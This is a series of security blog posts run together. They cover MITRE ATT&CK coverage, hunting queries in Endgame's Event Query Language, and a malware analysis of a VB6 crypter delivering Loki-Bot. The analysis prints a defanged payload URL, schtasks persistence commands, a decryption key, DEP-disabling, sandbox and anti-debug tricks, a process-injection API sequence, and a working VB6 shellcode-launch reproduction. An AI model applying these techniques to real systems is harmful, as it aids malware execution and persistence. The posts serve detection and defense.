An attack model also helps quantify the success of the security team. Fewer alerts, fewer incidents, and less damage and loss are the result of a mature security organization. This leads to a challenge, though, when talking to leadership about budgeting for more security products and more people: proving the negative. A security team needs to demonstrate that the absence of a breach is due to the successful defensive posture of the security program, not a lack of attempted attacks. A huge benefit of adopting an attack model is that it provides a way to show increasing value through coverage. Teams can report their increasing coverage of the ATT&CK Matrix as an indicator of security effectiveness. A strong case for analysts or technology can be made when there are gaps in the Matrix, and validation can occur when the organization increases its percentage of coverage.

Roberto Rodriguez, an adversary researcher at Specter Ops, has written an excellent blog post describing a scaled model for assessing ATT&CK coverage, as well as some open-source tools to help develop this mapping. In it, he describes a great way to report the upward trend of coverage (Figure 2). Tools like these play an essential role in identifying gaps in coverage while facilitating executive-level discussions about the various aspects of a security program and its coverage.

 

Figure 2: Roberto Rodriguez’s Upward Trend Based on ATT&CK Matrix Coverage

 

What’s Next

With the ATT&CK framework in hand, organizations gain a range of security benefits. I’ve already addressed the value for executive decision making and communication, as well as the holistic coverage, but the ATT&CK framework enables so much more. Organizations can begin to optimize other aspects of their security program as well. For instance, ATT&CK helps organizations move from reactive to proactive defense postures. By gaining visibility and protection across the threat groups known to have attacked the corporate ecosystem, security teams can set their sights more broadly. They can look at attacks against other verticals which may target them in the future and expand defenses against other cells in the ATT&CK matrix. This can also enable threat hunters to have tactical focus in these areas, honing in on those gaps until coverage is in place. This saves time and creates efficiencies.

In addition, ATT&CK augments purple teaming by using red team exercises to not only find unknown security gaps, but also to verify defenses. The red team focus on previously proven behaviors strengthens the security posture and facilitates maintenance, while blue teams are able to ensure they have the processes and protections in place and up to date to cover these attacker techniques.

Because MITRE also updates the framework with feedback from the community, it is well situated to stay on top of the latest adversarial behavior and to continue providing benefits as that behavior changes. At Endgame, we have fully embraced the ATT&CK framework and believe it best reflects the constantly and rapidly changing threat environment. Our coverage is directly tied to MITRE ATT&CK behavioral tactics and techniques, our alerts link to MITRE’s Wiki for analyst training and reference, and we contribute back to MITRE. For more information on how Endgame can help you outpace the adversary by embracing MITRE ATT&CK as a core protection strategy, contact us at info@endgame.com.

Introducing Event Query Language


Adversarial activity is no longer described purely in terms of static Indicators of Compromise (IOCs). Focusing solely on IOCs leads to detections which are brittle and ineffective at discovering unknown attacks, because adversaries modify toolkits to easily evade indicator-based detections. Instead, practitioners need durable detections based on malicious behaviors. MITRE’s ATT&CK™ framework helps practitioners focus their defensive tradecraft on these malicious behaviors. By organizing adversary tradecraft and behaviors into a matrix of tactics and techniques, ATT&CK™ is ideal to progress detection beyond IOCs and toward behavior-based detection.

With a comprehensive and robust model of adversarial behavior in place, the next step is to build an architecture for event collection that supports hunting and real-time detection, along with a language that promotes usability and performance. We created the Event Query Language (EQL) for hunting and real-time detection, with a simple syntax that helps practitioners express complex queries without a high barrier to entry. I’ll discuss the motivation behind EQL, how it fits into the overall Endgame architecture, and provide several examples of EQL in action to demonstrate its power to drive hunting and real-time detection of adversarial behavior.

 

Simplifying Complex Queries

Many database and search platforms are cumbersome and unintuitive, with complex syntax and a high barrier to entry. Detecting suspicious behavior requires analysis of multiple data sources and seamless data collection, aggregation, and analysis capabilities. Searching and exploring data should be intuitive and iterative, with the flexibility to fine-tune questions and hone in on suspicious behavior.

Within the Endgame platform, we create functionality to overcome these data analysis and detection challenges. Our goal is to empower users without overwhelming them. That’s why we initially created Artemis, which enables analysts to search using natural English, with intuitive phrases like “Find the process wmic.exe running on active Windows endpoints.” However, analysts also often want to search for things that are difficult to describe clearly and concisely in English. We knew that addressing this next challenge would require a new query language that supports our unique architecture and equips users to find suspicious activity. Our solution, EQL, balances usability while significantly expanding capabilities for both hunting and detection. It can be used to answer complex questions without burdening users with the inner workings of joins, transactions, aggregations, or state management that accompany many database solutions and analysis frameworks. EQL has proven effective, and we’re excited to introduce it to the community to drive real-time detection.

 

Endgame’s Eventing Architecture

Several architectural decisions in the Endgame platform played a pivotal role in the design and development of EQL. In the age of big data, Endgame takes an efficient and distributed approach to event collection, enrichment, storage, and analysis. Most solutions require data to be forwarded to the cloud to perform analysis, generate alerts, and take action. This introduces a delay for detection, increases network bandwidth utilization, and most importantly, implies that disconnected endpoints are less protected.

With the Endgame platform, live monitoring, collection, and analysis happen where the action happens: on the endpoint. This endpoint-focused architecture allows for rapid search at scale while minimizing bandwidth, cloud storage, and time spent waiting for results. It also enables process and endpoint enrichment, unique forms of stateful analysis—like tracking process lineage—and autonomous decisions without any need for platform or cloud connectivity. When an endpoint detects suspicious behavior, it makes a prevention or detection decision and alerts the platform of suspicious activity with the corresponding events. This decision happens without requiring a round trip to the Endgame management platform or the cloud, assuring that disconnected and connected endpoints are equally protected from suspicious behavior.

These architectural decisions drove the logical next step: structuring a language that optimizes these capabilities. As we developed EQL, we aimed to create a language that is accommodating to users, optimized for our architecture, and shareable for defenders.

 

Designing a Language

We wanted to ensure EQL supported sophisticated questions within a familiar syntax to limit the learning curve and maximize functionality. EQL provides abstractions that allow a user to perform stateful queries, identify sequences of events, track process ancestry, join across multiple data sources, and perform stacking. In designing EQL, we focused first on exposing the underlying data schema. Every collected event consists of an event type and set of properties. For example, a process event has fields such as the process identifier (PID), name, time, command line, parent information, and a subtype to differentiate creation and termination events. At the most basic level, an event query matches an event type to a condition based on some Boolean logic to compare the fields. The where keyword is used to tie these two together in a query. Conditionals are combined with Boolean operators and, or, and not; comparisons <, <=, ==, !=, >=, >, and in; and function calls. Numbers and strings are expressed easily, and wildcards (*) are supported. All of this leads to a simple syntax that should feel similar to Python.

When searching for a single event, it is easy to express many English questions with EQL in a readable, streamlined syntax. For example, the question:

What unique outgoing IPv4 network destinations were reached by svchost.exe to port 1337 with the IP blocks 192.168.0.0/16 or 172.16.0.0/16?

is expressed in EQL as:

network where 
  event_subtype_full == "ipv4_connection_attempt_event" and 
  process_name == "svchost.exe" and 
  destination_port == 1337 and
  (destination_address == "192.168.*" or destination_address == "172.16.*")
| unique destination_address destination_port

 

EQL supports searches for multiple related events that are chained together with a sequence of event queries, as well as post-processing similar to Unix pipes (|). Defenders can assemble these components to define simple or sophisticated behaviors without needing to understand the lower-level mechanics. These building blocks are combined to build powerful hunting analytics and real-time detections in the Endgame platform.

 

Applying EQL 

In the Endgame platform, when valid EQL is entered, the query is compiled and sent to the endpoints which then execute the query and return results. This happens quickly and in parallel, allowing users to immediately see results. Let’s take a look at how EQL is expressed in the following scenarios.

 

IOC Search

IOC searching isn’t hunting, but it is an important piece of many organizations’ daily security operations. Endgame users can express a simple IOC search in EQL:

process where sha256=="551d62be381a429bb594c263fc01e8cc9f80bda97ac3787244ef16e3b0c05589"

 

Many Endgame users choose to use Artemis’ natural language capabilities for this sort of search by simply asking, "Search processes for 551d62be381a429bb594c263fc01e8cc9f80bda97ac3787244ef16e3b0c05589".

 

Time Bound Searches

There are many times during incident response when it is useful to know everything that happened at a specific time on an endpoint. Using a special event type called any, which matches against all events, EQL can match every event within a five-minute window.

What events occurred between 12 PM UTC and 12:05 PM UTC on April 1, 2018?

any where timestamp_utc >= "2018-04-01 12:00:0Z" and timestamp_utc <= "2018-04-01 12:05:0Z"

 

Stacking on the Endpoint

We can filter and process our data as it is searched, without having to pull all the raw results back for stacking, establishing situational awareness, and identifying outlier activity. The language provides data pipes, which are similar to unix pipes, but instead of manipulating lines of input, a data pipe receives a stream of events, performs processing, and outputs another stream of events. Supported pipes enable you to:

  • Count the number of times something has occurred
    | count <expr>,<expr>,...
  • Output events that meet a Boolean condition
    | filter <condition>
  • Output the first N events
    | head <number>
  • Output events in ascending order
    | sort <expr>, <expr>, ...
  • Output the last N events
    | tail <number>
  • Remove duplicates that share properties
    | unique <expr>,<expr>,...

 

Which users ran multiple distinct enumeration commands?

join by user_name
    [process where process_name=="whoami.exe"]
    [process where process_name=="hostname.exe"]
    [process where process_name=="tasklist.exe"]
    [process where process_name=="ipconfig.exe"]
    [process where process_name=="net.exe"]
| unique user_name

 

Which network destinations first occurred after May 1st?

network where event_subtype_full=="ipv4_connection_attempt_event"
| unique destination_address, destination_port
| filter timestamp_utc >= "2018-05-01"

 

Sequence of Events

Many behaviors aren’t atomic and span multiple events. To define an ordered series of events, most query languages require elaborate joins or transactions, but EQL provides a sequence construct. Every item in the sequence is described with an event query between square brackets [<event query>]. Sequences can optionally be constrained to a timespan with the syntax with maxspan=<duration>, expire early with the syntax until [<event query>], or match field values with the by keyword.
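
As a sketch, a sequence skeleton that combines all three options could look like the following; the termination subtype in the until clause is a placeholder, since the exact value depends on the schema:

sequence by user_name with maxspan=30m
  [process where process_name == "powershell.exe"]
  [network where destination_port == 443]
until
  [process where event_subtype_full == "process_termination_event"]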

What files were created by non-system users, first ran as a non-system process, and later ran as a system-level process within an hour?

sequence with maxspan=1h
  [file where event_subtype_full=="file_create_event" and user_name!="SYSTEM"] by file_path
  [process where user_name!="SYSTEM"] by process_path
  [process where user_name=="SYSTEM"] by process_path

 

Process Ancestry

The language can even express relationships in a process ancestry. This could be used to look for anomalies that may have normal parent-child relationships, but are chained together in a suspicious way. To check if a process has a certain ancestor, the syntax descendant of [<ancestor query>] is used.

Did any descendant processes of Word ever create or modify any executable files in system32?

file where file_path=="C:\\Windows\\System32\\*" and file_name=="*.exe" and
  descendant of [process where process_name=="WINWORD.exe"]

 

Process ancestry relationships also support nesting and Boolean logic, facilitating rigorous queries. This helps hone in on specific activity and filter out noise.

Did net.exe run from a PowerShell instance that generated network activity and wasn’t a descendant of NoisyService.exe?

process where process_name=="net.exe" and 
  descendant of [network where process_name=="powershell.exe" and
      not descendant of [process where process_name == "NoisyService.exe"]]

 

Function Calls

Functions extend EQL’s capabilities; new functions can be defined and exposed without any change to the syntax. The length() function, for example, is useful for finding suspicious and rare PowerShell command lines:

What are the unique long PowerShell command lines with suspicious arguments?

process where process_name in ("powershell.exe", "pwsh.exe") and length(command_line) > 400 and
  (command_line=="*enc*" or command_line=="*IO.MemoryStream*" or
   command_line=="*iex*" or command_line=="* -e* *bypass*")
| unique command_line

 

Sorting with Thresholds

EQL can also be used for performing outlier analysis. The pipes sort and tail filter data on the endpoint so only outliers are returned. With a search constructed this way, there is a well-defined upper bound on how many results are returned by an endpoint. That means there is less bandwidth used, no need for number crunching after the fact, and less time sifting through results. In other words, you don’t have to obtain and store data you don’t need.

What top five outgoing network connections transmitted more than 100MB?

network where total_out_bytes > 100000000
| sort total_out_bytes
| tail 5

 

Macro Expansion

There is often logic that is shared between various queries. Multiple detections can utilize macros for code reuse and consistency. For instance, a macro could exist that identifies if a file is associated with system or network enumeration:

macro ENUM_COMMAND(name)
    name in ("whoami.exe", "hostname.exe", "ipconfig.exe", "net.exe", ...)

 

Once defined, macros are used and expanded with the function call syntax. One useful query for hunting may be to find enumeration commands that were spawned from a command shell that is traced back to an unsigned process:

process where ENUM_COMMAND(process_name) and parent_process_name=="cmd.exe"
    and descendant of [process where signature_status=="noSignature"]

 

Real-Time Detection With EQL

Since historical searches and real-time analytics are both described with EQL, it’s easy to check new protections for noise before deployment. This is crucial because alert fatigue is one of the most common problems faced by the defender today. When creating a new analytic, Endgame researchers use a refinement process to filter out false positives.

When detecting malicious behavior and attacker techniques, the first step is often detonating malware or a malicious script and collecting endpoint data. Once data is collected, events are explored with EQL and a new query is written. To establish a reasonable degree of confidence, we then evaluate the query against many sources of data, including Endgame’s internal network, partner data, and custom environments that are intentionally noisy. After passing these checks, a new tradecraft analytic expressed in EQL is enriched with metadata and converted to a format which Endgame’s detection engine understands. Finally, this machine representation of the query is loaded into the sensor, where new events are analyzed in real-time and an alert is generated immediately when a match is detected.

 

Writing Behavioral Malware Detections

EQL is not limited by the underlying data. In fact, we use EQL in our malware detonation and analysis sandbox, Arbiter®, which has a different underlying data schema. Expressing behavioral detections of malware with EQL in Arbiter® is painless, and our custom analysis engine performs orders of magnitude faster than other approaches we evaluated, allowing us to rapidly perform dynamic malware analysis and detect new behaviors.

 

Process Injection Detection in Arbiter

A traditional remote shellcode injection technique uses several well documented Windows APIs to open a handle to a remote process, allocate memory, write to the newly allocated memory, and start a thread. The code generally looks something like:

hVictim = OpenProcess(PROCESS_ALL_ACCESS, 0, victimPid);                      // open a handle to the target process
lpDestAddress = VirtualAllocEx(hVictim, NULL, numBytes, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);  // allocate executable memory in the target
WriteProcessMemory(hVictim, lpDestAddress, lpSourceAddress, numBytes, NULL);  // copy the shellcode into the allocation
CreateRemoteThread(hVictim, NULL, 0, lpStart, NULL, NULL, NULL);              // start a remote thread to run it
CloseHandle(hVictim);                                                         // release the handle

 

To build an analytic using API events, the process handle needs to be correctly tracked. The handle hVictim is first returned by OpenProcess and then used as an argument in the calls to VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. However, if and when CloseHandle is called, the handle is invalidated and all state for that handle needs to be thrown away, because it may be reused. It may sound complicated, but a stateful detection for Arbiter® is easy to create with EQL.

 

sequence
  [api_ret  where function_name=="OpenProcess"] by return_value
  [api_call where function_name=="VirtualAllocEx"] by arguments.hProcess
  [api_call where function_name=="WriteProcessMemory"] by arguments.hProcess
  [api_call where function_name=="CreateRemoteThread"] by arguments.hProcess
until
  [api_call where function_name=="CloseHandle"] by hObject

 

One sequence is not enough to detect all forms of process injection. There are many methods to gain arbitrary code execution in another process, each with different API calls, and each requiring another detection. Consequently, as the attacker’s playbook continues to evolve, defenders need to react quickly and find new ways to detect the latest techniques while simultaneously promoting layered detections.
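
As a purely hypothetical illustration, a variant that starts the remote thread through NtCreateThreadEx instead of CreateRemoteThread would need its own sequence; the function choice and the argument names below are assumptions rather than the actual Arbiter® schema:

sequence
  [api_ret  where function_name=="OpenProcess"] by return_value
  [api_call where function_name=="VirtualAllocEx"] by arguments.hProcess
  [api_call where function_name=="WriteProcessMemory"] by arguments.hProcess
  [api_call where function_name=="NtCreateThreadEx"] by arguments.ProcessHandle
until
  [api_call where function_name=="CloseHandle"] by hObject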

 

Unifying Hunt and Detection

With the Event Query Language, we can describe events that correspond to adversary techniques without dealing with the mechanics of traditional databases, rule engines, or an awkward data schema. Search, hunt, and detect are unified within the Endgame platform by EQL, where exploring events is made easy without sacrificing power and flexibility. Ultimately, EQL helps Endgame and Endgame customers quickly find suspicious activity and improve detections of attacker techniques defined in MITRE’s ATT&CK™.

Advancing our collective understanding and adoption of security tools is of utmost importance to combat today’s threats. At Endgame, sharing information about capabilities we’ve built and the underlying architecture which motivated our decisions is one way for us to do that. We look forward to discussions within the security community going forward about EQL and its value in driving advanced hunt and detection in a way that is performant, robust, and most importantly, empowering to defenders.


    What Year Is It? VB6 Payload Crypter

    $
    0
    0

    Last year, researchers identified new crimeware, Loki-Bot, which steals data and login credentials. Loki-Bot is generally distributed through malicious spam and is difficult to identify without digging into the malware itself. The Loki-Bot crimeware targets Windows, in contrast to the recent Android banking ransomware of the same name. While the crimeware is not especially prevalent in the wild, it has some unique and differentiating characteristics.

    Loki-Bot’s crypter is especially interesting and unique because it utilizes Visual Basic 6.0 to load multiple stages of shellcode to deliver the Loki-Bot payload. We saw an interesting sample highlighted by @DissectMalware on Twitter and decided to take a closer look for ourselves. We’ll walk through Loki-Bot’s crypter functionality, the first and second stage shellcodes, the payload, and then provide some thoughts on stopping these kinds of attacks and what we can expect to see next.

     

    Loki-Bot Crypter Functionality

    The main Visual Basic compiled binary uses a raw pointer access technique to jump into the first stage shellcode, which then calls the second stage shellcode executed off of the stack. The first stage shellcode disables Data Execution Prevention (DEP) to make the stack executable and uses a jmp esp to transfer control to the stage 2 shellcode. Stage 2 then sets up persistence, decrypts the payload, and executes the payload contents using process hollowing. In this case the payload is Loki-Bot, crimeware designed to steal private information from a system. Loki-Bot’s functionality has already been covered in detail elsewhere, so we will instead focus on the mode of compromise and its anti-reverse engineering tactics.

     

    Delivery Context

    This particular malware sample began its life with an RTF exploit. Generally, an RTF exploit is a specially crafted file that abuses vulnerabilities in the Rich Text Format parser of an application like Microsoft Word or Adobe Acrobat in order to gain code execution on the victim. The malware can then use this initial code execution to begin its exploit chain. Crafted files are usually spread as attachments in phishing emails, which was the case with this sample. Once the malware gains code execution on the host, it downloads jazz.exe from the link below.

    Source: hxxp://tpreiastephenville.com/jazz.exe

    Reference: https://twitter.com/DissectMalware/status/983640543828856832

    Sha256: a66f989e58ada2eff729ac2032ff71a159c521e7372373f4a1c1cf13f8ae2f0c

     

    PE Description

    The binary was compiled with VB6.0 Professional/Enterprise and so contains normal x86 assembly with a dependency on msvbvm60.dll. Stage 1 makes specific use of the Visual Basic runtime DLL to make calls into other libraries.

     

    First Stage Shellcode

    The first stage shellcode exists within the VB6 portion of the malware, which we’ll refer to as the crypter, specifically in the “rentegninger” submodule. The original submodule is partially overwritten with obfuscated shellcode. The public function “Remanipulation8” is called from Form_Load(). This function manipulates the values of the Virtual Function Table returned by the “Me” reference to the form.

    Set var_2 = Me

     

    How to Get the Shellcode Entrypoint

    Stage 1 overwrites one of the variables in the compiled Visual Basic 6 code to point to an offset in the middle of the “rentegninger” submodule. The pointer is a hard-coded integer that is calculated with integer division and a square root, as shown below.

    var_17 = 0x1526C77
    new_value = var_17 \ CLng(Sqr((25)))   ' integer-divide by Sqr(25) = 5
    new_value = 0x43AF4B                   ' 0x1526C77 \ 5 = 0x43AF4B, the shellcode entry point
    

     

     

    Utilizing StrPtr to Access Addresses

    In the code example below, the pointer to the Me value points to the beginning of the Virtual Function Table of the class that Me refers to; in this case the class is a Form. The entry at offset 0x2B0 is the function “Show”. That pointer is overwritten with the entry point of the shellcode, 0x43AF4B, so that calling “Form.Show” calls into the shellcode. An example of this is located in the Appendix.

     

    var_num1 = StrPtr(var_2) + 2B0h      ' address of the Show slot in the Virtual Function Table (base + 0x2B0)
    ReplacePtr(var_num1, new_value)      ' overwrite it with the shellcode entry point (ReplacePtr is pseudocode)
    

     

     

    This value is later called in the “Remanipulation8” function as call dword ptr [eax+2B0h], treating the call as a method of the Me object (dispatched via DispCallFunc).

     

     

    String-to-Stack Method

    The crypter uses a common trick to get the strings that are inline with the assembly onto the stack: when a call instruction executes, the address of the data immediately following it is pushed onto the stack as the return address. A disassembler will try to disassemble the string even though it never gets executed. The getdll and getstring routines in the Appendix shellcode show this pattern.

     

     

    Using Shell_NotifyIcon

    The first stage shellcode uses Shell_NotifyIcon in a non-standard way. It passes an address off the stack that does not resemble a proper PNOTIFYICONDATA struct, yet the Windows API still processes the events as if they were normal. As you can see below, the Shell_TrayWnd icon is junk data for this process. The API is called twice, once with NIM_ADD and once with NIM_DELETE.

     

     

    Utilizing the PEB Loader and DllFunctionCall

    The first stage shellcode uses a technique common among Windows shellcode to get a reference to DllFunctionCall by utilizing the Process Environment Block (PEB). The PEB is a data structure provided to every running process and can be used to gain information about that process, such as environment variables, image base addresses, and DLL imports. This shellcode contains a PEB loader routine that gets a reference to msvbvm60.dll and then finds DllFunctionCall by matching its signature bytes 0x8D560CEC. Once it has the correct offset to DllFunctionCall, it can use it to load Windows APIs and call them. More information on the PEB can be found here.

    In a nutshell, the loader routine walks a linked list of offset values and the string names of the desired functions: it linearly traverses the list, checks for the desired function, and saves its offset when found.

     

     

    Disabling Data Execution Prevention (DEP)

    The function ZwSetInformationProcess can be called with the parameters -1 (the current process) and 0x22 (ProcessExecuteFlags) to turn off DEP for the process. DEP was originally intended to prevent programs from executing code on the stack; however, DEP can also cause normal programs to crash without any notification. Giving the program the ability to turn off DEP for itself allows the malware to avoid unexpected crashes while also allowing its authors to execute shellcode explicitly on the stack. Microsoft Support provides additional details about DEP.

     

     

     

    Decoding the Shellcode

    The stage 1 shellcode then uses jmp esp to jump into the stack at the offset where the buffer for the stage 2 shellcode was allocated. The stage 2 shellcode that was initially loaded onto the stack undergoes an initial pass of XOR decoding with the immediate value 0x510473D1.

     

     

     

    Second Stage Shellcode

     

    Sandbox Evasion

     

     

    The stage 1 shellcode executes CPUID to detect if it is being run in a virtual environment. If it is, it exits; otherwise it continues execution normally. As detailed elsewhere, the malware sets the EAX register to 1, calls CPUID, and then checks the 31st bit of the ECX register by applying a bitmask. If the 31st bit is set, it knows it is being run in a virtual environment.

    Subsequently, the stage 1 shellcode calls the sleep function. Sleeping for prolonged durations of time is one evasion technique used by malware to subvert detection in sandboxed environments which are usually constrained by resource allocation to not run any given sample for longer than some established period of time, such as 30 seconds. Thus for the first 30 seconds of the program’s lifetime, it is benign and might fool some sandboxing environments.

     

    Anti-Debugging using NtYieldExecution

    The ntdll function NtYieldExecution, or its kernel32 equivalent SwitchToThread, allows the current thread to give up the remainder of its time slice and lets the next scheduled thread execute. If no threads are scheduled to execute, or the system is busy and will not allow such a switch to occur, the ntdll NtYieldExecution() function returns a STATUS_NO_YIELD_PERFORMED (0x40000024) status code, which causes the kernel32 SwitchToThread function to return zero. When an application is being debugged, the act of single-stepping through the code causes debug events and often results in no yield being allowed to occur. However, this is a hopelessly unreliable method of detecting the presence of a debugger, because it will also detect the presence of a thread running at high priority. An example of this code can be found here.

     

    for (int i = 0; i < 0x20; i++)
    {
        Sleep(0xf);
        if (NtYieldExecution() != STATUS_NO_YIELD_PERFORMED)
            iDebugged++;
    }
    

     

     

    Check for Adapters and Windows

    The stage 2 shellcode calls VirtualAllocEx to allocate a new memory region and populates it with GetAdaptersInfo. It checks offset +10Ch of the struct for the adapter Description. It then calls EnumWindows to check if the window has an empty string, most likely an attempt to detect execution within a sandbox.

     

    Persistence and Process Hollowing

    The stage 2 shellcode takes two routes. In the first route, the shellcode sets up persistence mechanisms with schtasks.exe. In the second route, it decrypts the payload with XOR and RC4, creates a suspended process of itself, and then hollows it out with the payload’s contents. Each route is explained below.

     

    Route 1 (Persistence)

    The stage 2 shellcode’s first route will acquire the hardcoded strings APPDATA=, TEMP=, and copied.exe in order to place a copy of itself in the %APPDATA% and %TEMP% locations as %AppData%\\Roaming\\copied.exe. Once the path is acquired, it will create a scheduled task to copy and run copied.exe using ShellExecuteA.

    schtasks.exe" /Create /SC MINUTE /TN "Startup Key" /TR "%AppData%\\Roaming\\copied.exe"
    schtasks.exe "/run /tn \"Startup Key\""

     

    If that fails it will try again by adding "\" /RU SYSTEM"

    schtasks.exe" /Create /SC MINUTE /TN "Startup Key" /TR "%AppData%\\Roaming\\copied.exe" /RU SYSTEM

     

    It will also set the registry startup run key with:

    schtasks.exe /Create /SC HOURLY /MO 12 /TN \"Startup Key\" /TR \"reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"\\\"\"Startup Key\"\\\"\" /f /t REG_SZ /d \"\\\"\""

     

    Route 2 (Process Hollowing)

    The stage 2 shellcode’s second route focuses on decrypting the executable payload into memory and then hollowing out a child process to execute the payload. "Wee2" is the marker on the stack in the shellcode and in the file that denotes the beginning of the copy operation. The format is Wee2<length of payload><key>.

     

    Decrypting the Payload with Key

    The key is stored in the shellcode after the marker and size. Its length is 0x100 bytes, and it is shown below.

     

    00000000: 9944 4203 c046 b4f2 38dd 33ed 0281 473a  .DB..F..8.3...G:
    00000010: 1c76 67d8 43bc d9c6 000f 58c2 c9f7 280e  .vg.C.....X...(.
    00000020: 9fec 49ac 0bef bb56 8386 7d96 4c2a 4de3  ..I....V..}.L*M.
    00000030: 221f 6e80 8e65 e02b 06b8 5f6a cf5c 72b7  ".n..e.+.._j.\r.
    00000040: ea51 9354 1197 05ff 892e 843e 53d2 548b  .Q.T.......>S.T.
    00000050: 6dc7 b829 940d e6d3 0d60 a913 d604 795f  m..).....`....y_
    00000060: f0f9 9afd 183f 0ca7 d4d7 cee7 597b 9e34  .....?......Y{.4
    00000070: 7370 bfd1 dfb6 317c 5709 b0bb 20ad c308  sp....1|W... ...
    00000080: f7a2 e461 62e8 1250 da3b d54b a423 a5dc  ...ab..P.;.K.#..
    00000090: be18 c536 e51a 3724 5eb1 fa20 2755 cab0  ...6..7$^.. 'U..
    000000a0: 414a eb0a 6990 5df8 e1e4 dbf4 aacc ef41  AJ..i.]........A
    000000b0: c4c1 10de ecc3 3ecd 645a 01c8 2dfe d015  ......>.dZ..-...
    000000c0: 48f3 f1b2 b339 63a1 2b8c 269c f530 f6e9  H....9c.+.&..0..
    000000d0: cb25 1687 366b 8875 af02 0771 78a6 1bbd  .%..6k.u...qx...
    000000e0: 4e9b 3c5b bae1 ae49 3235 2c45 fbd9 fc92  N.<[...I25,E....
    000000f0: 15ce 1d2f 3d14 8f1e b567 5219 7e4f 2166  .../=....gR.~O!f
    

     

    The stage 2 shellcode uses the 0x100-byte key to XOR the 0x34801-byte Loki-Bot payload, then uses the same key to RC4-decrypt the result of the XOR operation.

     

     

    The shellcode then calls CreateProcessW to create a process of itself in suspended mode. It uses NtCreateFile, NtWriteVirtualMemory, and NtUnmapViewOfSection to hollow out the newly created process and fill it with the Loki-Bot payload. NtGetContextThread and NtSetContextThread are used to resume the process. The parent process terminates, allowing the child to run as an orphan process. Because the Loki-Bot payload has already been reviewed by many researchers, we will not detail it here.

     

    Conclusion

    There are a few key aspects of this crypter and its behavior that make it suspicious, including its crafty use of the VB6 runtime to reach shellcode, its anti-reverse engineering techniques, and its use of process hollowing. First, VB6 and the VB6 runtime are rather old; while there are numerous binary distributions of software in the wild that were built with VB6 Enterprise, their use is still suspicious. Other suspicious activities include disabling its own DEP and checking whether it is being virtualized. Lastly, the crypter makes calls to the Windows API with malformed structs (i.e., the lack of an image for Shell_NotifyIcon). The combination of all of these suspicious activities could signal to a sensor like Endgame MalwareScore™ that the program is up to no good, allowing us to stop it before the final execution occurs.

    As for the future, we are likely to see more samples using legacy run times and features. Judging from this sample, a performant Visual Basic 6 crypter has recently been distributed in the wild. It seems natural that in the future its capabilities will improve and the volume of distribution will increase with continued black market adoption.

     

    Appendix: Stage 1 Code Replication

    After careful analysis, we were able to reproduce the method of Stage 1 shellcode execution in VB6. The code below will only display an empty message box.

     

    VB6 Code

    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" _
        (ByRef lpvDest As Any, _
         ByRef lpvSrc As Any, _
         ByVal cbLength As Long)
    
    Private Sub Form_Load()
        Me.Hide
        Dim lngRc As Long
        CopyMemory lngRc, Me, 4                       ' read the object pointer behind Me
        CopyMemory lngRc, ByVal lngRc, 4              ' dereference it to get the Virtual Function Table pointer
        CopyMemory ByVal (lngRc + 688), 4202169, 4    ' overwrite the Show slot (688 = 0x2B0) with the shellcode address (4202169 = 0x401EB9)
        Me.Show                                       ' calling Show now jumps into the shellcode
    End Sub
    

     

    Shellcode

    E9 88 00 00 00 59 E9 8E 00 00 00 5A E8 0C 00 00 00 50 6A 00 6A 00 6A 00 6A 00 
    FF D0 C3 64 A1 30 00 00 00 8B 40 0C 8B 40 14 8B 00 8B 58 28 BE 4C 00 53 00 46 
    39 33 75 F1 81 7B 04 56 00 42 00 8B 70 10 56 8B 5E 3C 36 8B 34 24 01 DE 8B 5E
    78 36 8B 04 24 01 D8 89 C6 83 C6 28 AD 85 C0 74 FB 03 04 24 BB 55 8B EC 83 39 
    18 75 EF 81 78 04 EC 0C 56 8D 75 E6 5B 31 DB 53 53 53 54 6A 00 81 04 24 00 00 
    04 00 52 51 54 FF D0 83 C4 1C C3 E8 73 FF FF FF 75 73 65 72 33 32 00 E8 6D FF 
    FF FF 4D 65 73 73 61 67 65 42 6F 78 41 00

     

    Assembly

    [SECTION .text]
    global Start
    Start:
        jmp     getdll
    nextstring:
        pop ecx
        jmp     getstring
    getapi:
        pop     edx ;put string in ebx 
        call    loadapi
        push    eax ;get MessageBoxA
        push    0
        push    0
        push    0
        push    0
        call    eax
        retn
    loadapi:
        mov     eax, [fs:0x30] ;Get the address of PEB
        mov     eax, [eax+0x0C] ;Get the address of PEB_LDR_DATA
        mov     eax, [eax+0x14] ;Get InMemoryOrderModuleList
    loop1:
        mov     eax, [eax]
        mov     ebx, [eax+0x28]
        mov     esi, 0x53004C ;L S
        inc     esi ;M S for MSVBVM60.DLL
        cmp     [ebx], esi
        jnz     loop1
        cmp     dword [ebx+0x4], 0x420056 ;V B for MSVBVM60.DLL
        mov     esi, [eax+0x10]
        push    esi
        mov     ebx, [esi+0x3C]
        mov     esi, [ss:esp] ;<msvbvm60.Ordinal958>
        add     esi, ebx
        mov     ebx, [esi+0x78]
        mov     eax, [ss:esp] ;<msvbvm60.Ordinal958>
        add     eax, ebx
        mov     esi, eax
        add     esi, 0x28
    loop2:
    	lodsd
    	test    eax, eax
    	jz      short loop2
    	add     eax, [esp]
    	mov     ebx, 0x83EC8B55
    	cmp     dword [eax], ebx
    	jnz     short loop2
    	cmp     dword [eax+0x4], 0x8D560CEC ;DllFunctionCall
    	jnz     short loop2
    	pop     ebx
    	xor     ebx, ebx
    	push    ebx
    	push    ebx
    	push    ebx
    	push    esp
    	push    0
    	add     dword [esp], 0x40000
    	push    edx ;MessageBoxA
    	push    ecx ;user32
    	push    esp
    	call    eax ;DllFunctionCall
    	add     esp, 0x1C
    	retn
    getdll:
        call nextstring
    	db 0x75 ;u
    	db 0x73 ;s
    	db 0x65 ;e
    	db 0x72 ;r
    	db 0x33 ;3
    	db 0x32 ;2
    	db 0x00
    getstring:
        call getapi
    	db 0x4D ;M
    	db 0x65 ;e
    	db 0x73 ;s
    	db 0x73 ;s
    	db 0x61 ;a
    	db 0x67 ;g
    	db 0x65 ;e
    	db 0x42 ;B
    	db 0x6F ;o
    	db 0x78 ;x
    	db 0x41 ;A
    	db 0x00
    

     

    How We Built Our Automated UI Testing Framework

    $
    0
    0

    When I recently joined Endgame as an intern on the Quality Assurance (QA) team, I was tasked to build a reliable and scalable automated UI testing framework that integrates with our manual testing process. QA automation frameworks for front end code are fraught with challenges. They have to handle frequent updates to the UI and rely heavily on all downstream systems working in sync. We also had to handle common issues with the browser automation tool “baked in” to our current framework, and overcome brittleness in the application wherein minor changes could potentially lead to system failure.

